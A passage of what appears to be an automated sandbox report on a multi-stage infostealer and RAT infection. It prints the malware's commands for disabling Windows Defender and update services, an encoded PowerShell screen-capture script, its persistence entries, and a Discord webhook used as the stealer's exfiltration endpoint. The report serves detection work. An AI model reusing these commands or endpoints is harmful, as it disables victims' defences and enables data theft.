AoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 8656 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 8696 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46F0.tmp" "c:\Users\user\AppData\Local\Temp\4kug0kj4\CSCF8A59A62395742289D2EBFCBD5DF8363.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 8728 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8872 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8736 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

getmac.exe (PID: 8848 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)

cmd.exe (PID: 8976 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 9004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 9092 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 9180 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 9196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 6824 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8264 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8092 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

dasHost.exe (PID: 8408 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe" MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)

dasHost.exe (PID: 7956 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe" MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)

cmd.exe (PID: 3652 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Blank Grabber

{"C2 url": "https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\_MEI17002\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
C:\Recovery\winlogon.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\winlogon.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Mozilla Firefox\dwm.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Mozilla Firefox\dwm.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\powershell.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\powershell.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\ProgramData\svchost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\ProgramData\svchost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 10 entries

Memory Dumps

Source	Rule	Description	Author
00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000003.1736293542.00000202B6EA5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
0000000C.00000003.1760108075.0000000005C00000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000003.1750025071.000000000773B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000006.00000003.1736293542.00000202B6EA3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
0000000C.00000003.1761289490.0000000006400000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000034.00000000.1797015711.0000000000AF2000.00000002.00000001.01000000.00000025.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000034.00000002.1960895196.000000001341B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: based.exe PID: 1700	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: based.exe PID: 6900	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: based.exe PID: 6900	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: based.exe PID: 6900	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author
12.3.svchost.exe.5c4e6ea.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
12.3.svchost.exe.5c4e6ea.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.3.svchost.exe.644e6ea.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
12.3.svchost.exe.644e6ea.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
52.0.ChainComServermonitor.exe.af0000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
52.0.ChainComServermonitor.exe.af0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.3.svchost.exe.5c4e6ea.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
12.3.svchost.exe.5c4e6ea.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.3.svchost.exe.644e6ea.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
12.3.svchost.exe.644e6ea.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 3652, ProcessName: cmd.exe

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe, ProcessId: 7204, TargetFilename: C:\ProgramData\svchost.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Public\Documents\My Pictures\wouVpTZDoyPyABKEH.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ProcessId: 8024, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wouVpTZDoyPyABKEH

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 6900, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ProcessId: 7296, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 6900, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7304, ProcessName: cmd.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 7268, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7500, ProcessName: wscript.exe

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 7268, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7500, ProcessName: wscript.exe

Sigma detected: Suspicious Startup Folder Persistence

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 6900, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr

Sigma detected: System File Execution Location Anomaly

Source: Process started

